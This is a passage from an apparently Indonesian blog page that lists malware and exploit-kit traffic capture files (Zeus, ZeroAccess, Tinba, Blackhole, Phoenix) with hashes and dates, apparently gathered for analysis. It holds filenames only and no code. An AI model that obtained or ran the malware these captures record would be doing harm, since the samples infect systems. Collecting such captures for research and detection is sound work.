    46.  
  46. BIN_Tbot_2E1814CCCF0C3BB2CC32E0A0671C0891_2012-12.pcap
    47.  
  47. BIN_Tbot_5375FB5E867680FFB8E72D29DB9ABBD5_2012-12.pcap
    48.  
  48. BIN_Tbot_A0552D1BC1A4897141CFA56F75C04857_2012-12.pcap
    49.  
  49. BIN_Tbot_FC7C3E087789824F34A9309DA2388CE5_2012-12.pcap
    50.  
  50. BIN_Tinba_2012-06.pcap
    51.  
  51. BIN_Vobfus_634AA845F5B0B519B6D8A8670B994906_2012-12.pcap
    52.  
  52. BIN_Xpaj_2012-05.pcap
    53.  
  53. BIN_ZeroAccess_3169969E91F5FE5446909BBAB6E14D5D_2012-10.pcap
    54.  
  54. BIN_ZeusGameover_2012-02.pcap
    55.  
  55. BIN_Zeus_2010-12.pcap
    56.  
  56. EK_Blackholev1_2012-03.pcap
    57.  
  57. EK_Blackholev1_2012-08.pcap
    58.  
  58. EK_Blackholev2_2012-09.pcap
    59.  
  59. EK_Blackhole_Java_CVE-2012-4681_2012-08.pcap
    60.  
  60. EK_Phoenix_2012-04.pcap
    61.  
  61. EK_Smokekt150(Malwaredontneedcoffee)_2012-09.pcap -  credit malware.dontneedcoffee.com
    62.  
 
 
Related articles











Dicatat oleh



di





































        

      









Langgan:
Catatan (Atom)